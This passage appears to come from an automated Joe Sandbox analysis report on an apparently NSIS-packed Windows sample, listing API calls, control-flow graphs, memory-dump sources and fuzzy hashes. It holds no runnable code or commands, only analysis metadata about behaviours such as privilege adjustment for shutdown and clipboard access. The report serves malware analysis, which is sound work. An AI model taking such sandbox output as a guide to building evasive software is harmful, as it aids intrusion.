                                                                                                                                                                                            • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                                                                                            • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A47
                                                                                                                                                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403A69
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,00000000), ref: 00403A70
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B13
                                                                                                                                                                                            • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                          • String ID: 1033$47305662$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                                          • API String ID: 2017177436-2961917500
                                                                                                                                                                                          • Opcode ID: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
                                                                                                                                                                                          • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
                                                                                                                                                                                          • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 149 4056e5-405700 150 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 149->150 151 40588f-405896 149->151 169 4057eb-4057ee 150->169 170 4057cf-4057e9 SendMessageW * 2 150->170 153 4058c0-4058cd 151->153 154 405898-4058ba GetDlgItem CreateThread FindCloseChangeNotification 151->154 155 4058eb-4058f5 153->155 156 4058cf-4058d5 153->156 154->153 160 4058f7-4058fd 155->160 161 40594b-40594f 155->161 158 405910-405919 call 404507 156->158 159 4058d7-4058e6 ShowWindow * 2 call 4044d5 156->159 173 40591e-405922 158->173 159->155 166 405925-405935 ShowWindow 160->166 167 4058ff-40590b call 404479 160->167 161->158 164 405951-405957 161->164 164->158 171 405959-40596c SendMessageW 164->171 174 405945-405946 call 404479 166->174 175 405937-405940 call 4055a6 166->175 167->158 176 4057f0-4057fc SendMessageW 169->176 177 4057fe-405815 call 4044a0 169->177 170->169 178 405972-40599d CreatePopupMenu call 40655e AppendMenuW 171->178 179 405a6e-405a70 171->179 174->161 175->174 176->177 188 405817-40582b ShowWindow 177->188 189 40584b-40586c GetDlgItem SendMessageW 177->189 186 4059b2-4059c7 TrackPopupMenu 178->186 187 40599f-4059af GetWindowRect 178->187 179->173 186->179 190 4059cd-4059e4 186->190 187->186 191 40583a 188->191 192 40582d-405838 ShowWindow 188->192 189->179 193 405872-40588a SendMessageW * 2 189->193 194 4059e9-405a04 SendMessageW 190->194 195 405840-405846 call 4044d5 191->195 192->195 193->179 194->194 196 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 195->189 198 405a2b-405a52 SendMessageW 196->198 198->198 199 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 198->199 199->179
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                                                                                                                            • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058BA
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405972
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405A0D
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405A68
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                          • String ID: {$fh
                                                                                                                                                                                          • API String ID: 4154960007-3185793605
                                                                                                                                                                                          • Opcode ID: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                                                                                          • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 663 406c3f-406c44 664 406cb5-406cd3 663->664 665 406c46-406c75 663->665 668 4072ab-4072c0 664->668 666 406c77-406c7a 665->666 667 406c7c-406c80 665->667 669 406c8c-406c8f 666->669 670 406c82-406c86 667->670 671 406c88 667->671 672 4072c2-4072d8 668->672 673 4072da-4072f0 668->673 675 406c91-406c9a 669->675 676 406cad-406cb0 669->676 670->669 671->669 674 4072f3-4072fa 672->674 673->674 680 407321-40732d 674->680 681 4072fc-407300 674->681 677 406c9c 675->677 678 406c9f-406cab 675->678 679 406e82-406ea0 676->679 677->678 685 406d15-406d43 678->685 683 406ea2-406eb6 679->683 684 406eb8-406eca 679->684 688 406ac3-406acc 680->688 686 407306-40731e 681->686 687 4074af-4074b9 681->687 689 406ecd-406ed7 683->689 684->689 691 406d45-406d5d 685->691 692 406d5f-406d79 685->692 686->680 690 4074c5-4074d8 687->690 694 406ad2 688->694 695 4074da 688->695 697 406ed9 689->697 698 406e7a-406e80 689->698 696 4074dd-4074e1 690->696 693 406d7c-406d86 691->693 692->693 700 406d8c 693->700 701 406cfd-406d03 693->701 702 406ad9-406add 694->702 703 406c19-406c3a 694->703 704 406b7e-406b82 694->704 705 406bee-406bf2 694->705 695->696 717 407461-40746b 697->717 718 406e5f-406e77 697->718 698->679 699 406e1e-406e28 698->699 711 40746d-407477 699->711 712 406e2e-406ff7 699->712 723 406ce2-406cfa 700->723 724 407449-407453 700->724 713 406db6-406dbc 701->713 714 406d09-406d0f 701->714 702->690 708 406ae3-406af0 702->708 703->668 715 406b88-406ba1 704->715 716 40742e-407438 704->716 709 406bf8-406c0c 705->709 710 40743d-407447 705->710 708->695 719 406af6-406b3c 708->719 720 406c0f-406c17 709->720 710->690 711->690 712->668 712->688 721 406e1a 713->721 722 406dbe-406ddc 713->722 714->685 714->721 726 406ba4-406ba8 715->726 716->690 717->690 718->698 727 406b64-406b66 719->727 728 406b3e-406b42 719->728 720->703 720->705 721->699 729 406df4-406e06 722->729 730 406dde-406df2 722->730 723->701 724->690 726->704 731 406baa-406bb0 726->731 737 406b74-406b7c 727->737 738 406b68-406b72 727->738 734 406b44-406b47 GlobalFree 728->734 735 406b4d-406b5b GlobalAlloc 728->735 736 406e09-406e13 729->736 730->736 732 406bb2-406bb9 731->732 733 406bda-406bec 731->733 739 406bc4-406bd4 GlobalAlloc 732->739 740 406bbb-406bbe GlobalFree 732->740 733->720 734->735 735->695 741 406b61 735->741 736->713 742 406e15 736->742 737->726 738->737 738->738 739->695 739->733 740->739 741->727 744 407455-40745f 742->744 745 406d9b-406db3 742->745 744->690 745->713
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                                                                                          • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 804 40687e-406892 FindFirstFileW 805 406894-40689d FindClose 804->805 806 40689f 804->806 807 4068a1-4068a2 805->807 806->807
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                          • String ID: X_B
                                                                                                                                                                                          • API String ID: 2295610775-941606717
                                                                                                                                                                                          • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                                                          • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 200 403fa1-403fb3 201 403fb9-403fbf 200->201 202 40411a-404129 200->202 201->202 203 403fc5-403fce 201->203 204 404178-40418d 202->204 205 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 202->205 206 403fd0-403fdd SetWindowPos 203->206 207 403fe3-403fea 203->207 209 4041cd-4041d2 call 4044ec 204->209 210 40418f-404192 204->210 205->204 206->207 212 403fec-404006 ShowWindow 207->212 213 40402e-404034 207->213 219 4041d7-4041f2 209->219 215 404194-40419f call 401389 210->215 216 4041c5-4041c7 210->216 220 404107-404115 call 404507 212->220 221 40400c-40401f GetWindowLongW 212->221 222 404036-404048 DestroyWindow 213->222 223 40404d-404050 213->223 215->216 235 4041a1-4041c0 SendMessageW 215->235 216->209 218 40446d 216->218 230 40446f-404476 218->230 227 4041f4-4041f6 call 40140b 219->227 228 4041fb-404201 219->228 220->230 221->220 229 404025-404028 ShowWindow 221->229 231 40444a-404450 222->231 233 404052-40405e SetWindowLongW 223->233 234 404063-404069 223->234 227->228 239 404207-404212 228->239 240 40442b-404444 DestroyWindow KiUserCallbackDispatcher 228->240 229->213 231->218 238 404452-404458 231->238 233->230 234->220 241 40406f-40407e GetDlgItem 234->241 235->230 238->218 244 40445a-404463 ShowWindow 238->244 239->240 245 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 239->245 240->231 242 404080-404097 SendMessageW IsWindowEnabled 241->242 243 40409d-4040a0 241->243 242->218 242->243 246 4040a2-4040a3 243->246 247 4040a5-4040a8 243->247 244->218 272 404267-40426c 245->272 273 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 245->273 249 4040d3-4040d8 call 404479 246->249 250 4040b6-4040bb 247->250 251 4040aa-4040b0 247->251 249->220 253 4040f1-404101 SendMessageW 250->253 255 4040bd-4040c3 250->255 251->253 254 4040b2-4040b4 251->254 253->220 254->249 258 4040c5-4040cb call 40140b 255->258 259 4040da-4040e3 call 40140b 255->259 270 4040d1 258->270 259->220 268 4040e5-4040ef 259->268 268->270 270->249 272->273 276 4042b0 273->276 277 4042ad-4042ae 273->277 278 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 276->278 277->278 279 4042e2-4042f3 SendMessageW 278->279 280 4042f5 278->280 281 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 279->281 280->281 281->219 292 404340-404342 281->292 292->219 293 404348-40434c 292->293 294 40436b-40437f DestroyWindow 293->294 295 40434e-404354 293->295 294->231 297 404385-4043b2 CreateDialogParamW 294->297 295->218 296 40435a-404360 295->296 296->219 298 404366 296->298 297->231 299 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 297->299 298->218 299->218 304 404411-404424 ShowWindow call 4044ec 299->304 306 404429 304->306 306->231
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403FFD
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 0040403C
                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0040413A
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                                                                                                                          • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                          • String ID: fh
                                                                                                                                                                                          • API String ID: 121052019-2499785175
                                                                                                                                                                                          • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                                                                                          • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
